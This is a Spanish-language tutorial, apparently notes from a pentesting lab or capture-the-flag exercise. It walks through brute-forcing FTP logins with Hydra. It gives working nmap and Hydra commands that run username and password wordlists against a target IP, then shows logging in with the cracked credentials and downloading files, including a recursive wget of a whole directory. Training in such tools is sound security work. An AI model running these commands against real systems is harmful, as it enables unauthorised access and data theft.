CRACKEAR PASSWORD CON HYDRA

Hydra es una herramienta de fuerza bruta que ayuda a los evaluadores de penetración y a los piratas informáticos éticos a descifrar las contraseñas de los servicios de red.

Hydra puede realizar ataques rápidos de diccionario contra más de 50 protocolos. Esto incluye telnet, FTP, HTTP, HTTPS, SMB, bases de datos y varios otros servicios.

Hydra fue desarrollado por el grupo de hackers » [The Hacker’s Choice](https://www.thc.org/) «. Hydra se lanzó por primera vez en 2000 como una herramienta de prueba de concepto que demostraba cómo se pueden realizar ataques a los servicios de inicio de sesión de red.

Hydra también es un cracker de inicio de sesión paralelizado. Esto significa que puedes tener más de una conexión en paralelo. A diferencia de la fuerza bruta secuencial, esto reduce el tiempo necesario para descifrar una contraseña.

Cómo instalar hydra
apt install hydra
1. Para Crackear credenciales FTP usando un ataque de diccionario primero tenemos que comprobar que el puerto 21 (FTP) este abierto.
sudo su
nmap -p 21 [IP-Address]
3. Ponemos la direccion donde se encuentra nuestra Wordlist
sudo su
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://192.128.1.4
PARA EVITAR PROBLEMAS EN LA BUSQUEDA SINO NO FUNCIONA ES COPIAR EL CONTENIDO DE LA LISTA DE LA WORDLIST DE USUARIOS Y CONTRASEÑAS > CREAR UN NUEVO DOCUMENTO TXT (PASS Y USERS) EN EL ESCRITORIO Y PEGAR EL CONTENIDO EN ELLO

Hydra prueba varias combinaciones de nombres de usuario y contraseñas (presentes en los archivos Usernames.txt y Passwords.txt) en el servidor FTP y genera nombres de usuario y contraseñas crackeados, como se muestra en la captura de pantalla. 

 
4. En el caso que nos den un usuario y no la contraseña ponemos el siguiente comando.
hydra -l user -P passlist.txt ftp://192.128.1.4
5. Una vez finalizado el proceso de descifrado de contraseñas, nos conectamos a la direccion de FTP con las credenciales que nos han proporcinado para ver si exite conexion con el servidor.
ftp://192.128.1.4
6. Descargar una vez conectados mediante ftp 
 
Descargar un fichero
get flag.txt
Descargar un directorio entero.
wget -r ftp://direccion-del-servidor.com/directorio